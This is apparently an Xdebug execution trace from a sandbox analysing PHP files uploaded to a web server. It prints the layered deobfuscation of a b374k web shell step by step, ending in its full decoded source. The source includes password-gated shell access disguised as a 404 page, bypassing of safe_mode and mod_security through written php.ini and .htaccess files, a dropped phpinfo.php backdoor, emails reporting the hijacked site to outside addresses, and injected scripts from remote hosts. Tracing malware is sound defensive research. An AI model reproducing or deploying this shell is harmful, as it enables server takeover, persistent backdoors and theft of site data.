($_GET[\'mkdir\'] != "")){\r\n\t$path = $pwd.$_GET[\'mkdir\'];\r\n\t@mkdir($path);\r\n}\r\n\t$buff = showdir($pwd,$prompt);\r\n\techo $buff;\r\n}\r\n?>\r\n<br><input class=inputzbut align=left type=submit name=ini value="Bypass Disable Functions and Safemode" />\r\n<?php\r\nif(isset($_POST[\'ini\']))\r\n\t{\r\n\t\t\r\n$byphp = "safe_mode = Off\r\ndisable_functions = None\r\nsafe_mode_gid = OFF\r\nopen_basedir = OFF\r\nallow_url_fopen = On";\r\n$byht = "<IfModule mod_security.c>\r\nSecFilterEngine Off\r\nSecFilterScanPOST Off\r\nSecFilterCheckURLEncoding Off\r\nSecFilterCheckUnicodeEncoding Off\r\n</IfModule>";\r\nfile_put_contents("php.ini",$byphp);\r\nfile_put_contents(".htaccess",$byht);\r\necho "<script>alert(\'Disable Functions and Safemode Created\'); hideAll();</script>";\r\ndie();\r\n\t\t\r\n\t\t}\r\n\r\n?><center><br><br><div class="info">-=[ b374k r3c0ded by <b>X\'1N73CT</b> ]=-</div><br>\r\n<div class="jaya">&copy; 2013 X\'1N73CT</div></center><br><br>\r\n</script>\r\n</div>\r\n<?php\r\n\r\n$ikrhtfy = $_SERVER["DOCUMENT_ROOT"].\'/\'.\'phpinfo.php\';\r\n\r\n\r\n$fghky_ouvcbt = \'<?php phpinfo();\r\n\r\n\r\n$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";\r\n$gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAimJmdmoFCB2NZlgqVobRLXemwlekB8PSBazZLFbIHPfRsqapn5Z2WFCGLcWb5Ls9hJahXA7YV+RHfRiYvgTQpUFHyk8tcxG2ovhQOTquhQ66yaMV9H6FEhemC6vu7woIlYFCFlmOADdmcnyI39588cbGYIw42qSs//TI4HhYD0z0ItUW6T0Zs4GozL1SjnL3tNWA5gc9D9v0HFwI8adFVbcin/sGwUBwJe+HaAeFg/cGwYB4/lBgWA";\r\neval(htmlspecialchars_decode(urldecode(base64_decode($gz))));\r\n\r\n?>\'; \r\n\r\n\r\n\r\nif (!file_exists($ikrhtfy)){  \r\n   \r\ntouch($ikrhtfy); \r\nchmod($ikrhtfy,0666); \r\n   \r\n} \r\n\r\n$opazxcdnm = fopen($ikrhtfy,"w"); \r\n\r\nif (!fwrite($opazxcdnm,$fghky_ouvcbt)){ \r\n\r\nexit; \r\n\r\n}\r\n\r\n$b = "Soldier\'ss";\r\n$c = "Dosya Yolu : " . $_SERVER[\'DOCUMENT_ROOT\'] . "\r\n";\r\n$c.= "Server Admin : " . $_SERVER[\'SERVER_ADMIN\'] . "\r\n";\r\n$c.= "Server isletim sistemi : " . $_SERVER[\'SERVER_SOFTWARE\'] . "\r\n";\r\n$c.= "Shell Link : http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'PHP_SELF\'] . "\r\n";\r\n$c.= "Avlanan Site : " . $_SERVER[\'HTTP_HOST\'] . "\r\n";\r\nmail("[email protected]", $b, $c);\r\nmail("[email protected]", $b, $c);\r\necho "<SCRIPT SRC=http://teledramasinhala.com/img/icons/image.js></SCRIPT>";\r\n?>\r\n</body>\r\n</html>\r\n'	/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code	1	0
3		A						/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code(1) : eval()'d code	4	$auth_pass = '9c80a1eaca699e2fc6b994721f8703bc'
3		A						/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code(1) : eval()'d code	5	$color = '#00ff00'
3		A						/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code(1) : eval()'d code	6	$default_action = 'FilesMan'
4	16	0	0.035389	1962656	define	0		/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code(1) : eval()'d code	7	2	'SELF_PATH'	'/var/www/html/uploads/nasi.php.suspected(4) : eval()\'d code(1) : eval()\'d code'
4	16	1	0.035415	1962760
4	16	R			TRUE
4	17	0	0.035433	1962688	strpos	0		/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code(1) : eval()'d code	8	2	'python-requests/2.25.1'	'Google'
4	17	1	0.035451	1962760
4	17	R			FALSE
4	18	0	0.035465	1962688	session_start	0		/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code(1) : eval()'d code	12	0
4	18	1	0.035580	1963440
4	18	R			TRUE
4	19	0	0.035598	1963440	error_reporting	0		/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code(1) : eval()'d code	13	1	0
4	19	1	0.035613	1963480
4	19	R			0
4	20	0	0.035628	1963440	ini_set	0		/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code(1) : eval()'d code	14	2	'error_log'	NULL
4	20	1	0.035647	1963512
4	20	R			''
4	21	0	0.035660	1963440	ini_set	0		/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code(1) : eval()'d code	15	2	'log_errors'	0
4	21	1	0.035676	1963512
4	21	R			'1'
4	22	0	0.035689	1963440	ini_set	0		/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code(1) : eval()'d code	16	2	'max_execution_time'	0
4	22	1	0.035707	1963544
4	22	R			'30'
4	23	0	0.035720	1963440	ini_set	0		/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code(1) : eval()'d code	17	2	'output_buffering'	0
4	23	1	0.035736	1963512
4	23	R			FALSE
4	24	0	0.035749	1963440	ini_set	0		/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code(1) : eval()'d code	18	2	'display_errors'	0
4	24	1	0.035764	1963512
4	24	R			''
4	25	0	0.035778	1963440	set_time_limit	0		/var/www/html/uploads/nasi.php.suspected(4) : eval()'d code(1) : eval()'d code	19	1	0
4	25	1	0.035794	1963504
4	25	R			FALSE
3	15	1	0.035843	1964952
2	7	1	0.035922	1188632
1	3	1	0.035931	1186136
1	26	0	0.035940	1186168	Error->__toString	0		Unknown	0	0
2	27	0	0.035955	1186248	Error->getTraceAsString	0		Unknown	0	0
2	27	1	0.035967	1186504
2	27	R			'#0 /var/www/html/uploads/nasi.php.suspected(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/nasi.php.suspected(4): eval()\n#2 {main}'
1	26	1	0.035989	1190640
1	26	R			'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/nasi.php.suspected(4) : eval()\'d code(1) : eval()\'d code:20\nStack trace:\n#0 /var/www/html/uploads/nasi.php.suspected(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/nasi.php.suspected(4): eval()\n#2 {main}'
			0.036055	1111224
TRACE END   [2023-02-12 20:32:24.578565]

data/traces/1e7a0085735ff79f9c3991f34c3903e1_trace-1676243900.0257.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:18:45.923559]
1	0	1	0.000253	393528
1	3	0	0.001320	529576	{main}	1		/var/www/html/uploads/teeest.php	0	0
1		A						/var/www/html/uploads/teeest.php	2	$gz = 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
1		A						/var/www/html/uploads/teeest.php	3	$gzinflate = '==gUvWNlt4nBt8C/8QwxBckuNdbLJs6ILukjeYxHrkvmvnU4xzdVAu1vWRoDOZb6pTEB9le7vGPB+oUB1thTmsHe44NtyXkySc6Mfb1xWfdgblCCZdORfQUE9VayDcRdjDJv/Qxg3A91eucd1LejBOIFLbaZ6iwWg6utvWrqk5e4zL833/2LjGNx2hr4K1sguEadsDAR7wmcdMyJjp1hZ7eypjsla+tZHS/CBV/YkMY5qWDPwRXf2O7byPupteBywmOGaFfMKrF6yLBEdY6JGltEO5dBWDid4yVXjpf72ixq2zEbBv80mwgLnuPyadOng0IVlgQqncFqEXMjh5CuQWQwLg4bRk+Lkn+Fcd002y4bvB9OcyPl3RvTUs6qruoFDqQQJFrg6naeguRo3Oe/tlnJCqUsJH+FTpIa7CahxobhVxs2+CsoBFWZYzhKLvq0OhCJRAKQU+tnpj+20FL4Ev11CVJR6w2IQ1f19KY5tu4o7hRLbnrm1b/zY6djv15G'
2	4	0	0.001478	529576	base64_decode	0		/var/www/html/uploads/teeest.php	4	1	'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
2	4	1	0.001501	529864
2	4	R			'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24gzinflate%29%29%29%29%29%29%29%29%3B'
2	5	0	0.001523	529832	urldecode	0		/var/www/html/uploads/teeest.php	4	1	'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24gzinflate%29%29%29%29%29%29%29%29%3B'
2	5	1	0.001543	530088
2	5	R			'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	6	0	0.001562	529800	htmlspecialchars_decode	0		/var/www/html/uploads/teeest.php	4	1	'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	6	1	0.001581	530024
2	6	R			'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	7	0	0.001616	532152	eval	1	'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'	/var/www/html/uploads/teeest.php	4	0
3	8	0	0.001633	532152	strrev	0		/var/www/html/uploads/teeest.php(4) : eval()'d code	1	1	'==gUvWNlt4nBt8C/8QwxBckuNdbLJs6ILukjeYxHrkvmvnU4xzdVAu1vWRoDOZb6pTEB9le7vGPB+oUB1thTmsHe44NtyXkySc6Mfb1xWfdgblCCZdORfQUE9VayDcRdjDJv/Qxg3A91eucd1LejBOIFLbaZ6iwWg6utvWrqk5e4zL833/2LjGNx2hr4K1sguEadsDAR7wmcdMyJjp1hZ7eypjsla+tZHS/CBV/YkMY5qWDPwRXf2O7byPupteBywmOGaFfMKrF6yLBEdY6JGltEO5dBWDid4yVXjpf72ixq2zEbBv80mwgLnuPyadOng0IVlgQqncFqEXMjh5CuQWQwLg4bRk+Lkn+Fcd002y4bvB9OcyPl3RvTUs6qruoFDqQQJFrg6naeguRo3Oe/tlnJCqUsJH+FTpIa7CahxobhVxs2+CsoBFWZYzhKLvq0OhCJRAKQU+tnpj+20FL4Ev11CVJR6w2IQ1f19KY5tu4o7hRLbnrm1b/zY6djv15G'
3	8	1	0.001777	667352
3	8	R			'AEiAt38AR4C4fwBCgL1/eJwAQoC9f3ic7P15d+JI0igO/119Tn8HNeMZ7HGVEZttqsruZl8MmH3r7uujDRBowUisM30/+xuRKQmJxQbbNc+d3/tUdxUgZUZGRkbGkhkZ+f3XyXDC/PzTzz8F/smctyWeqQ8lRWH48E1kzEzDAiuGRYZfMUt/ULsJC+a/RanPzRSTmXCG8dXH0KeyrjG+C+afAQB1xs3M4RO+Zu4YX0y4ZbmgxAncdSwmhfrCNR+LRW5Cwf7tDRvmBd83rCLoij7F4n9j2X6fZelTq6knjjZwx/gzsiIZJU7z4/vf4L2sSef+erqYearEGzn/Z+bpKZMvpp+eLrCE3D9nDHM60Y3zs6d6utZK13735xqNylMTfj3Fs+lyw//nZ39W1weK5L9gfrm7Y/qcYkjMBfMvAMDAn6HEidL0nNQLBK9YJsJGmLJuMhl9pol+0hCWk5ayid//QtQMyTAA5yfD5KbmOSnzmzSd6tOnqTTRp6asDc5Z'
3	9	0	0.001889	667320	base64_decode	0		/var/www/html/uploads/teeest.php(4) : eval()'d code	1	1	'AEiAt38AR4C4fwBCgL1/eJwAQoC9f3ic7P15d+JI0igO/119Tn8HNeMZ7HGVEZttqsruZl8MmH3r7uujDRBowUisM30/+xuRKQmJxQbbNc+d3/tUdxUgZUZGRkbGkhkZ+f3XyXDC/PzTzz8F/smctyWeqQ8lRWH48E1kzEzDAiuGRYZfMUt/ULsJC+a/RanPzRSTmXCG8dXH0KeyrjG+C+afAQB1xs3M4RO+Zu4YX0y4ZbmgxAncdSwmhfrCNR+LRW5Cwf7tDRvmBd83rCLoij7F4n9j2X6fZelTq6knjjZwx/gzsiIZJU7z4/vf4L2sSef+erqYearEGzn/Z+bpKZMvpp+eLrCE3D9nDHM60Y3zs6d6utZK13735xqNylMTfj3Fs+lyw//nZ39W1weK5L9gfrm7Y/qcYkjMBfMvAMDAn6HEidL0nNQLBK9YJsJGmLJuMhl9pol+0hCWk5ayid//QtQMyTAA5yfD5KbmOSnzmzSd6tOnqTTRp6asDc5Z'
3	9	1	0.002321	802520
3	9	R			'\000H��\000G��\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2�'
3	10	0	0.004090	667320	gzinflate	0		/var/www/html/uploads/teeest.php(4) : eval()'d code	1	1	'\000H��\000G��\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2�'
3	10	1	0.005908	769752
3	10	R			'\000G��\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017�'
3	11	0	0.007865	634552	gzinflate	0		/var/www/html/uploads/teeest.php(4) : eval()'d code	1	1	'\000G��\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017�'
3	11	1	0.009690	736984
3	11	R			'\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<'
3	12	0	0.011915	634552	gzinflate	0		/var/www/html/uploads/teeest.php(4) : eval()'d code	1	1	'\000B��x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<'
3	12	1	0.013778	736984
3	12	R			'x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<"%\f���'
3	13	0	0.015540	634552	gzuncompress	0		/var/www/html/uploads/teeest.php(4) : eval()'d code	1	1	'x�\000B��x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<"%\f���'
3	13	1	0.017450	736984
3	13	R			'x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<"%\f���*�|���0C:'
3	14	0	0.019227	634552	gzuncompress	0		/var/www/html/uploads/teeest.php(4) : eval()'d code	1	1	'x��yw�H�(\016�]}N\a5�\031�q�\021�m���f_\f�}���\r\020h�H�3}?�\033�)\t��\006�5ϝ�Tw\025 eFFFFƒ\031\031����p����?\005�ɜ�%��\017%Ea��Md�L�\002+�E�_1KP�\t\v�E���\024��p����Ч��1�\v�\001\000u����\023�f�\030_L�e���\t�u,&���5\037�EnB���\r\033�\005�7�"�>��c�~�e�S��\'�6p�3�"\031%N���ཬI�z��y��\0339�g��)�/���.���?g\fs:э�z��J�~��\032��S\023~=ų�r��gV�\a��`~��c��bH�\005�/\000����ĉ���\v\004�X&�F��n2\031}��~�\020������B�\f�0\000�\'���9)�4��ӧ�4ѧ��\r�Y�X��\'C2��\017����bq�-<"%\f���*�|���0C:'
3	14	1	0.022069	986840
3	14	R			'<?php \r\n\r\n/* (Web Shell b374k r3c0d3d by x\'1n73ct|default pass:" 1n73ction ") */ \r\n$auth_pass = "9c80a1eaca699e2fc6b994721f8703bc"; \r\n$color = "#00ff00"; \r\n$default_action = \'FilesMan\'; \r\n@define(\'SELF_PATH\', __FILE__); \r\nif( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { \r\n    header(\'HTTP/1.0 404 Not Found\'); \r\n    exit; \r\n} \r\n@session_start(); \r\n@error_reporting(0); \r\n@ini_set(\'error_log\',NULL); \r\n@ini_set(\'log_errors\',0); \r\n@ini_set(\'max_executio'
3	15	0	0.028212	1962256	eval	1	'?><?php \r\n\r\n/* (Web Shell b374k r3c0d3d by x\'1n73ct|default pass:" 1n73ction ") */ \r\n$auth_pass = "9c80a1eaca699e2fc6b994721f8703bc"; \r\n$color = "#00ff00"; \r\n$default_action = \'FilesMan\'; \r\n@define(\'SELF_PATH\', __FILE__); \r\nif( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { \r\n    header(\'HTTP/1.0 404 Not Found\'); \r\n    exit; \r\n} \r\n@session_start(); \r\n@error_reporting(0); \r\n@ini_set(\'error_log\',NULL); \r\n@ini_set(\'log_errors\',0); \r\n@ini_set(\'max_execution_time\',0);\r\n@ini_set(\'output_buffering\',0); \r\n@ini_set(\'display_errors\', 0);\r\n@set_time_limit(0); \r\n@set_magic_quotes_runtime(0); \r\n@define(\'VERSION\', \'2.1\'); \r\nif( get_magic_quotes_gpc() ) { \r\n    function stripslashes_array($array) { \r\n        return is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array); \r\n    } \r\n    $_POST = stripslashes_array($_POST); \r\n} \r\nfunction printLogin() { \r\n    ?> \r\n<SCRIPT SRC=http://w0rms.com/sayac.js></SCRIPT>\r\n<h1>Not Found</h1> \r\n<p>The requested URL was not found on this server.</p> \r\n<hr> \r\n<address>Apache Server at <?=$_SERVER[\'HTTP_HOST\']?> Port 80</address> \r\n    <style> \r\n        input { margin:0;background-color:#fff;border:1px solid #fff; } \r\n    </style> \r\n    <center> \r\n    <form method=post> \r\n    <input type=password name=pass> \r\n    </form></center> \r\n    <?php \r\n    exit; \r\n} \r\nif( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) \r\n    if( empty( $auth_pass ) || \r\n        ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) \r\n        $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true; \r\n    else \r\n        printLogin();\r\n\t\t\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'output_buffering\',0);\t\r\nif(isset($_GET[\'dl\']) && ($_GET[\'dl\'] != "")){\r\n\t$file = $_GET[\'dl\'];\r\n\t$filez = @file_get_contents($file);\r\n   header("Content-type: application/octet-stream"); \r\n   header("Content-length: ".strlen($filez)); \r\n   header("Content-disposition: attachment; filename=\\"".basename($file)."\\";");\r\n   echo $filez; \r\n    exit; \r\n}\r\nelseif(isset($_GET[\'dlgzip\']) && ($_GET[\'dlgzip\'] != "")){\r\n\t$file = $_GET[\'dlgzip\'];\r\n\t$filez = gzencode(@file_get_contents($file));\r\n   header("Content-Type:application/x-gzip\\n"); \r\n   header("Content-length: ".strlen($filez)); \r\n   header("Content-disposition: attachment; filename=\\"".basename($file).".gz\\";");\r\n   echo $filez; \r\n    exit; \r\n}\r\n// view image\r\nif(isset($_GET[\'img\'])){\r\n\t\t@ob_clean(); \r\n\t\t$d = magicboom($_GET[\'y\']);\r\n\t\t$f = $_GET[\'img\'];\r\n\t\t$inf = @getimagesize($d.$f); \r\n   \t\t$ext = explode($f,"."); \r\n   \t\t$ext = $ext[count($ext)-1]; \r\n   \t \t@header("Content-type: ".$inf["mime"]);\r\n   \t \t@header("Cache-control: public"); \r\n  \t\t@header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); \r\n  \t\t@header("Cache-control: max-age=".(60*60*24*7));  \r\n   \t \t@readfile($d.$f); \r\n   \t \texit; \r\n}\r\n\r\n// server software\r\n$software = getenv("SERVER_SOFTWARE");\r\n// check safemode\r\nif (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")  $safemode = TRUE; else $safemode = FALSE;\r\n// uname -a\r\n$system = @php_uname();\r\n// mysql\r\nfunction showstat($stat) {if ($stat=="on") {return "<b><font style=\'color:#00FF00\'>ON</font></b>";}else {return "<b><font style=\'color:#DD4736\'>OFF</font></b>";}}\r\nfunction testmysql() {if (function_exists(\'mysql_connect\')) {return showstat("on");}else {return showstat("off");}}\r\nfunction testcurl() {if (function_exists(\'curl_version\')) {return showstat("on");}else {return showstat("off");}}\r\nfunction testwget() {if (exe(\'wget --help\')) {return showstat("on");}else {return showstat("off");}}\r\nfunction testperl() {if (exe(\'perl -h\')) {return showstat("on");}else {return showstat("off");}}\r\n// check os\r\nif(strtolower(substr($system,0,3)) == "win") $win = TRUE;\r\nelse $win = FALSE; \r\n// change directory\r\nif(isset($_GET[\'y\'])){\r\n\tif(@is_dir($_GET[\'view\'])){\r\n\t\t$pwd = $_GET[\'view\'];\r\n\t\t@chdir($pwd);\r\n\t}\r\n\telse{\r\n\t\t$pwd = $_GET[\'y\'];\r\n\t\t@chdir($pwd);\r\n\t}\r\n}\r\n//hdd\r\nfunction convertByte($s) {\r\nif($s >= 1073741824)\r\nreturn sprintf(\'%1.2f\',$s / 1073741824 ).\' GB\';\r\nelseif($s >= 1048576)\r\nreturn sprintf(\'%1.2f\',$s / 1048576 ) .\' MB\';\r\nelseif($s >= 1024)\r\nreturn sprintf(\'%1.2f\',$s / 1024 ) .\' KB\';\r\nelse\r\nreturn $s .\' B\';\r\n}\r\n\r\n// username, id, shell prompt and working directory\r\nif(!$win){\r\n\tif(!$user = rapih(exe("whoami"))) $user = "";\r\n\tif(!$id = rapih(exe("id"))) $id = "";\r\n\t$prompt = $user." \\$ ";\r\n\t$pwd = @getcwd().DIRECTORY_SEPARATOR;\r\n}\r\nelse {\r\n\t$user = @get_current_user();\r\n\t$id = $user;\r\n\t$prompt = $user." &gt;";\r\n\t$pwd = realpath(".")."\\\\";\r\n\t// find drive letters\r\n \t$v = explode("\\\\",$d); \r\n\t$v = $v[0]; \r\n \tforeach (range("A","Z") as $letter) \r\n \t{ \r\n\t  $bool = @is_dir($letter.":\\\\");\r\n\t  if ($bool) \r\n\t  { \r\n \t\t  $letters .= "<a href=\\"?y=".$letter.":\\\\\\">[ ";\r\n\t\t   if ($letter.":" != $v) {$letters .= $letter;} \r\n\t\t   else {$letters .= "<span class=\\"gaya\\">".$letter."</span>";} \r\n\t\t   $letters .= " ]</a> "; \r\n  \t  }\t \r\n } \r\n}\r\n\r\nfunction testoracle() {\r\n    if (function_exists(\'ocilogon\')) { return showstat("on"); }\r\n    else { return showstat("off"); }\r\n    }\r\n\r\nfunction testmssql() {\r\n    if (function_exists(\'mssql_connect\')) { return showstat("on"); }\r\n    else { return showstat("off"); }\r\n    }\r\n\r\n function showdisablefunctions() {\r\n    if ($disablefunc=@ini_get("disable_functions")){ return "<span style=\'color:\'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; }\r\n    else { return "<span style=\'color:#00FF1E\'><b>NONE</b></span>"; }\r\n    }\r\n\t\r\nif(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;\r\nelse $posix = FALSE;\r\n// server ip\r\n$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);\r\n// your ip 